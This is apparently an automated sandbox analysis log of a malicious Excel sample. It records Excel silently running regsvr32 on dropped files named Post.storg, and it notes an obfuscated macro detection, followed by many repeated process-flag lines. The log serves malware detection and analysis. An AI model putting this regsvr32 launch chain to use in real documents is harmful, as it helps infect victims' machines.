Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg1 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg2 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: banUwVSwBY.xlsx Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: banUwVSwBY.xlsx Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: banUwVSwBY.xlsx Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: banUwVSwBY.xlsx Initial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
Source: banUwVSwBY.xlsx Initial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Data Obfuscation:

barindex
Yara detected Obfuscated Macro In XLSM
Source: Yara match File source: intlsheet4.xml, type: SAMPLE
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs